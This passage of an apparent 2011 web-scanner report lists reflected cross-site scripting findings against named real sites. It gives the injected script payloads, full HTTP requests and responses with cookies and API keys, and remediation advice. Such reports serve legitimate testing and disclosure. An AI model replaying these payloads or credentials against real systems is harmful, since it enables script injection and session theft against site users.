bh="b!!!#t!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#RY.~~!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%~~!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo~~!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h~~!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b~~!#p]T!!!!$<kL2n"; lifb=%y_Qs7i<Qa5p0/:
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:29:57 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:29:57 GMT
Pragma: no-cache
Content-Length: 4542
Age: 0
Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&bf0da"-alert(1)-"8c42b551633=1&click=http%3a%2f%2fad.doubleclick.net%2fclick%3Bh%3Dv8%2f3aa2%2f3%2f0%2f%2a%2fn%3B228957569%3B0%2d0%3B0%3B45421688%3B4307%2d300%2f250%3B38375088%2f38392845%2f1%3B%3B%7Eaopt%3D2%2f0%2f36%2f0%3B%7Essc ...[SNIP]...
The value of the &q request parameter is copied into the HTML document as plain text between tags. The payload bdab1<img%20src%3da%20onerror%3dalert(1)>4640eb6d92 was submitted in the &q parameter. This input was echoed as bdab1<img src=a onerror=alert(1)>4640eb6d92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 4d05c<script>alert(1)</script>0e5436c2494 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 15:29:30 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive
Unknown API key: (6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494)
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 33b74<script>alert(1)</script>22bbeb83d65 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 02 Feb 2011 15:29:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KTissx4pIKRxvaj5XcunNcMDa7Re6IGD4lOuDZWVHyjN4Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAipIisFvtN4t4VEVUJBxdqAyBAisqZAs2SfkIE4k0isgs29d6PAF0Hy6gC0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 206
Connection: keep-alive
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload af475<script>alert(1)</script>5b56c3fcd0c was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;
Response
HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 16:18:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: Close
Unknown API key: (6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c)
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b4387(a)c27091d8173 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /EntityImageHandler.ashxb4387(a)c27091d8173 HTTP/1.1
Host: api.blogburst.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 16:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 201
Error handler problem: Error Number: B8BUa0w7Ilp7zBNRYRdWMLni Error Path: /EntityImageHandler.ashxb4387(a)c27091d8173 Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 80c92(a)e7e03c35472 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico80c92(a)e7e03c35472 HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 19:10:36 GMT
Content-Length: 189
Error handler problem: Error Number: B83sUW5V9btfzEZ9C74xOolh Error Path: /favicon.ico80c92(a)e7e03c35472 Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f5c81(a)8b15d9b73ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:08 GMT
Content-Length: 205
Error handler problem: Error Number: B80iwlBCmlTpz5Pig5CAws6o Error Path: /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e8e6e(a)55b1a46fc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7 HTTP/1.1 Host: api.blogburst.com Proxy-Connection: keep-alive Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:19 GMT
Content-Length: 207

Error handler problem:
Error Number: B94M87SkpIdWCgjC0l2bFGg
Error Path: /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4506(a)4a5cdf0844b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:36 GMT
Content-Length: 209

Error handler problem:
Error Number: B8WJgPc8mOdez6tZwoiCJoTl
Error Path: /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b1dc(a)5a857af5c5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:41 GMT
Content-Length: 208

Error handler problem:
Error Number: B7fOWSgosfbjAnIBtXULjlA
Error Path: /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5fda3<script>alert(1)</script>05613b280fe was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/v1/ip.json?token=9629e1a2b682d7afd8c9cc104ad125c08fa0b490&callback=demandbase_parse5fda3<script>alert(1)</script>05613b280fe HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38302<script>alert(1)</script>c482f5e0c50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php. HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3788
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php was not able to be displayed.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8e2a<script>alert(1)</script>5612df9d36a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3789
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a was not able to be displayed.</p> ...[SNIP]...
1.70. http://apptools.com/examples/tableheight.php. [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://apptools.com
Path: /examples/tableheight.php.
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 96edc<script>alert(1)</script>1447630590d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3792
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 was not able to be displayed.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2523f<script>alert(1)</script>3ded236ecaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:31 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5125
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css was not able to be displayed.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e507e<script>alert(1)</script>60df3ed154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles/apptools.csse507e<script>alert(1)</script>60df3ed154 HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
